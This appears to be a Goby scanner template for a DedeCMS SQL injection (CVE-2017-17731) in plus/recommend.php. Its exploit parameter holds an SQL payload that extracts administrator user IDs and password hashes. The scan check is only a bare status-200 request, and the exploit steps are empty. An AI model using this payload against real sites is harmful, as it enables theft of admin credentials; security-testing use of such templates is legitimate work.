{ "Name": "DedeCMS recommend.php SQLi (CVE-2017-17731)", "Description": "DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.\\n", "Product": "DedeCMS", "Homepage": "http://www.dedecms.com/", "DisclosureDate": "2021-06-15", "Author": "sharecast.net@gmail.com", "GobyQuery": "app=\"DedeCMS\"", "Level": "2", "Impact": "
Hackers can execute SQL statements directly, so as to control the whole server: data acquisition, data modification, data deletion, etc.
1. the data input by users should be strictly filtered in the web code.
2. deploy web application firewall to monitor database operation.
3. upgrade to the latest version.
", "References": [ "https://github.com/fengxuangit/dede_exp_collect/blob/master/dede_recommend.php_sqli.py" ], "HasExp": true, "ExpParams": [ { "name": "cmd", "type": "input", "value": "select CONCAT(0x7c,userid,0x7c,pwd)+from+~#@__admin~ limit+0,1" } ], "ExpTips": { "Type": "text", "Content": "返引号替换为~" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": null, "Tags": [ "SQL Injection" ], "CVEIDs": ["CVE-2017-17731"], "CVSSScore": "0.0", "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }